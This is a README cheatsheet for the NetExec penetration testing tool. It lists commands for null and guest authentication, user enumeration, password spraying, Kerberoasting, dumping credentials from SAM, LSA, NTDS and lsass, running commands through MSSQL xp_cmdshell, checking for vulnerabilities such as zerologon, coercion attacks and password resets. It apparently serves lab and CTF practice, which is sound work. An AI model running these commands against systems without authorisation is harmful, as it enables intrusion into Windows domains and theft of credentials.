└── README.md


/README.md:
--------------------------------------------------------------------------------
  1 | # NetExec Cheatsheet
  2 | A cheatsheet for NetExec, featuring useful commands and modules for different services.<br>
  3 | 
  4 | You can find this cheatsheet on my website as well: [NetExec Cheatsheet](https://seriotonctf.github.io/CrackMapExec-and-NetExec-Cheat-Sheet/)
  5 | 
  6 | 
  7 | - **GitHub:** https://github.com/Pennyw0rth/NetExec
  8 | - **Wiki:** https://www.netexec.wiki
  9 | 
 10 | ## **Table of Contents**  
 11 | 1. [Installation](#installation)
 12 | 2. [Basic Usage](#basic-usage)
 13 | 3. [Authentication](#authentication)
 14 |    - [Null Authentication](#null-authentication)
 15 |    - [Guest Authentication](#guest-authentication)
 16 |    - [Local Authentication](#local-authentication)
 17 |    - [Kerberos Authentication](#kerberos-authentication)
 18 |    - [SMB Signing](#smb-signing)
 19 | 4. [Enumeration](#enumeration)
 20 |    - [Basic Enumeration](#basic-enumeration)
 21 |    - [List Shares](#list-shares)
 22 |    - [List Usernames](#list-usernames)
 23 |    - [Spraying](#spraying)
 24 | 5. [Service-Specific](#service-specific)
 25 |    - [SMB](#smb)
 26 |      - [All-in-One](#all-in-one)
 27 |      - [Extracting Files](#extracting-files)
 28 |      - [Spider_plus Module](#spider_plus-module)
 29 |      - [Generate Hosts File](#Generate-Hosts-File)
 30 |      - [Generate krb5 File](#Generate-krb5-File)
 31 |    - [LDAP](#ldap)
 32 |      - [User Enumeration](#user-enumeration)
 33 |      - [All-in-One](#all-in-one)
 34 |      - [Kerberoasting & ASREProast](#kerberoasting--asreproast)
 35 |      - [BloodHound](#bloodhound)
 36 |      - [LDAP signing](#ldap-signing)
 37 |      - [ADCS Enumeration](#adcs-enumeration)
 38 |      - [MachineAccountQuota](#machineaccountquota)
 39 |      - [Pre-Created Computer Accounts](#pre-created-computer-accounts)
 40 |      - [Find Misconfigured Delegation](#find-misconfigured-delegation)
 41 |    - [MSSQL](#mssql)
 42 |      - [Authentication](#authentication)
 43 |      - [Executing Commands via xp_cmdshell](#executing-commands-via-xp_cmdshell)
 44 |      - [Extracting Files](#extracting-files)
 45 |    - [FTP](#ftp)
 46 |      - [List Files & Directories](#list-files--directories)
 47 |      - [Retrieve a File](#retrieve-a-file)
 48 | 6. [Credential Dumping](#credential-dumping)
 49 |    - [Secrets Dump](#secrets-dump)
 50 |    - [NTDS](#ntds)
 51 |    - [DPAPI](#dpapi)
 52 |    - [lsass](#lsass)
 53 |    - [LAPS](#laps)
 54 |    - [gMSA](#gmsa)
 55 |    - [Group Policy Preferences](#group-policy-preferences)
 56 |    - [Retrieve MSOL account password](#retrieve-msol-account-password)
 57 | 7. [Vulnerabilities](#vulnerabilities)
 58 | 8. [Useful Modules](#useful-modules)
 59 |    - [Webdav](#webdav)
 60 |    - [Veeam](#veeam)
 61 |    - [slinky](#slinky)
 62 |    - [coerce_plus](#coerce_plus)
 63 |    - [enum_av](#enum_av)
 64 |    - [backup_operator](#backup_operator)
 65 |    - [change-password](#change-password)
 66 | 9. [Resources](#resources)
 67 | 10. [Practice](#practice)
 68 | 
 69 | ## **Installation**  
 70 | ```
 71 | sudo apt install pipx git
 72 | pipx ensurepath
 73 | pipx install git+https://github.com/Pennyw0rth/NetExec
 74 | ```
 75 | Latest version at the time of writing this
 76 | ```
 77 | netexec --version
 78 | 1.4.0 - SmoothOperator - 9668cbce - 7
 79 | ```
 80 | Upgrading via pipx
 81 | ```
 82 | pipx upgrade netexec
 83 | ```
 84 | ## **Basic Usage**  
 85 | ```
 86 | netexec <service> <target> -u <username> -p <password>
 87 | ```
 88 | ```
 89 | netexec <service> <target> -u <username> -H <hash>
 90 | ```
 91 | Example for SMB:  
 92 | ```
 93 | netexec smb target -u username -p password
 94 | ```
 95 | ## **Authentication**  
 96 | ### **Null Authentication**  
 97 | ```
 98 | netexec smb target -u '' -p ''
 99 | ```
100 | ### **Guest Authentication**  
101 | ```
102 | netexec smb target -u 'guest' -p ''
103 | ```
104 | ### **Local Authentication**  
105 | ```
106 | netexec smb target -u username -p password --local-auth
107 | ```
108 | ### **Kerberos Authentication**  
109 | ```
110 | netexec smb target -u username -p password -k
111 | ```
112 | ```
113 | netexec ldap target --use-kcache
114 | ```
115 | ### **SMB Signing**  
116 | ```
117 | netexec smb target(s) --gen-relay-list relay.txt
118 | ```
119 | ## **Enumeration**  
120 | ### **Basic Enumeration**  
121 | ```
122 | netexec smb target
123 | ```
124 | ### **List Shares**  
125 | ```
126 | netexec smb target -u '' -p '' --shares
127 | netexec smb target -u username -p password --shares
128 | ```
129 | ### **List Usernames**  
130 | ```
131 | netexec smb target -u '' -p '' --users
132 | netexec smb target -u '' -p '' --rid-brute
133 | netexec smb target -u username -p password --users
134 | ```
135 | ### **Spraying**   
136 | ```
137 | netexec smb target -u users.txt -p password --continue-on-success
138 | netexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success
139 | ```
140 | ```
141 | netexec ssh target -u username -p password --continue-on-success
142 | ```
143 | ## **Service-Specific**  
144 | ### **SMB**  
145 | #### **All-in-One**  
146 | ```
147 | netexec smb target -u username -p password --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol
148 | ```
149 | #### **Extracting Files**  
150 | ```
151 | netexec smb target -u username -p password -k --get-file target_file output_file --share sharename
152 | ```
153 | #### **Spider_plus Module**  
154 | ```
155 | netexec smb target -u username -p password -M spider_plus
156 | netexec smb target -u username -p password -M spider_plus -o READ_ONLY=false
157 | ```
158 | #### **Generate Hosts File**
159 | ```
160 | netexec smb target --generate-hosts-file <out_file>
161 | ```
162 | #### **Generate krb5 File**
163 | ```
164 | netexec smb target -u username -p password --generate-krb5-file <out_file>
165 | ```
166 | ### **LDAP**  
167 | #### **User Enumeration**  
168 | ```
169 | netexec ldap target -u '' -p '' --users
170 | ```
171 | #### **All-in-One**  
172 | ```
173 | netexec ldap target -u username -p password --trusted-for-delegation --password-not-required --admin-count --users --groups
174 | ```
175 | #### **Kerberoasting & ASREProast**  
176 | ```
177 | netexec ldap target -u username -p password --kerberoasting hash.txt
178 | netexec ldap target -u username -p password --asreproast hash.txt
179 | ```
180 | #### **BloodHound**  
181 | ```
182 | netexec ldap target -u username -p password --bloodhound --dns-server ip --dns-tcp -c all
183 | ```
184 | #### **LDAP signing**
185 | Checks whether LDAP signing and binding are required and/or enforced
186 | ```
187 | netexec ldap target -u username -p password -M ldap-checker
188 | ```
189 | #### **ADCS Enumeration**
190 | ```
191 | netexec ldap target -u username -p password -M adcs
192 | ```
193 | #### **MachineAccountQuota**
194 | ```
195 | netexec ldap target -u username -p password -M maq
196 | ```
197 | #### **Pre-Created Computer Accounts**
198 | ```
199 | netexec ldap target -u username -p password -M pre2k
200 | ```
201 | #### **Find Misconfigured Delegation**
202 | ```
203 | nxc ldap target -u username -p password --find-delegation
204 | ```
205 | ### **MSSQL**  
206 | #### **Authentication**  
207 | ```
208 | netexec mssql target -u username -p password
209 | ```
210 | #### **Executing Commands via xp_cmdshell**  
211 | ```
212 | netexec mssql target -u username -p password -x command_to_execute
213 | ```
214 | #### **Extracting Files**  
215 | ```
216 | netexec mssql target -u username -p password --get-file output_file target_file
217 | ```
218 | ### **FTP**  
219 | #### **List Files & Directories**  
220 | ```
221 | netexec ftp target -u username -p password --ls
222 | netexec ftp target -u username -p password --ls folder_name
223 | ```
224 | #### **Retrieve a File**  
225 | ```
226 | netexec ftp target -u username -p password --ls folder_name --get file_name
227 | ```
228 | ## **Credential Dumping**  
229 | ### **Secrets Dump**  
230 | ```
231 | netexec smb target -u username -p password --lsa
232 | netexec smb target -u username -p password --sam
233 | ```
234 | ### **NTDS**  
235 | ```
236 | netexec smb target -u username -p password --ntds
237 | netexec smb target -u username -p password -M ntdsutil
238 | ```
239 | ### **DPAPI**
240 | ```
241 | netexec smb target -u username -p password --dpapi
242 | ```
243 | ### **lsass**  
244 | ```
245 | netexec smb target -u username -p password -M lsassy
246 | ```
247 | ### **LAPS**  
248 | ```
249 | netexec smb target -u username -p password --laps
250 | ```
251 | ### **gMSA**
252 | ```
253 | netexec ldap target -u username -p password --gmsa
254 | netexec ldap target -u username -p password --gmsa-convert-id id
255 | netexec ldap domain -u username -p password --gmsa-decrypt-lsa gmsa_account
256 | ```
257 | ### **Group Policy Preferences**
258 | ```
259 | netexec smb target -u username -p password -M gpp_password
260 | ```
261 | ### **Retrieve MSOL account password**
262 | ```
263 | netexec smb target -u username -p password -M msol
264 | ```
265 | ### Chaining Arguments
266 | ```
267 | netexec smb target -u username -p password --sam --lsa --dpapi
268 | ```
269 | ## **Vulnerabilities**
270 | Check if the DC is vulnerable to zerologon, petitpotam, nopac
271 | ```
272 | netexec smb target -u username -p password -M zerologon
273 | netexec smb target -u username -p password -M petitpotam
274 | netexec smb target -u username -p password -M nopac
275 | ```
276 | ## Useful Modules
277 | ### **Webdav**
278 | Checks whether the WebClient service is running on the target
279 | ```
280 | netexec smb target -u username -p password -M webdav 
281 | ```
282 | ### **Veeam**
283 | Extracts credentials from local Veeam SQL Database
284 | ```
285 | netexec smb target -u username -p password -M veeam
286 | ```
287 | ### **slinky**
288 | Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions
289 | ```
290 | netexec smb target -u username -p password -M slinky 
291 | ```
292 | ### **coerce_plus**
293 | Check if the Target is vulnerable to any coerce vulns (PetitPotam, DFSCoerce, MSEven, ShadowCoerce and PrinterBug)
294 | ```
295 | netexec smb target -u username -p password -M coerce_plus -o LISTENER=tun0_ip
296 | ```
297 | ### **enum_av**
298 | Gathers information on all endpoint protection solutions installed on the the remote host
299 | ```
300 | netexec smb target -u username -p password -M enum_av
301 | ```
302 | ### **backup_operator**
303 | Exploit user in backup operator group to dump NTDS
304 | ```
305 | netexec smb target -u username -p password -M backup_operator
306 | ```
307 | ### **change-password**
308 | Change or reset user password
309 | ```
310 | netexec smb target -u username -p password -M change-password -o USER='target_user' NEWPASS='new_password'
311 | ```
312 | ## Resources
313 | - https://www.netexec.wiki/
314 | - https://www.rayanle.cat/lehack-2024-netexec-workshop-writeup/
315 | ## Practice
316 | - Mist (HackTheBox)
317 | - Rebound (HackTheBox)
318 | - Vintage (HackTheBox)
319 | - Cicada (HackTheBox)
320 | - Baby (Vulnlab)
321 | - Intercept (Vulnlab)
322 | - Reflection (Vulnlab)
323 | - NetExec Lab (https://github.com/Pennyw0rth/NetExec-Lab)


--------------------------------------------------------------------------------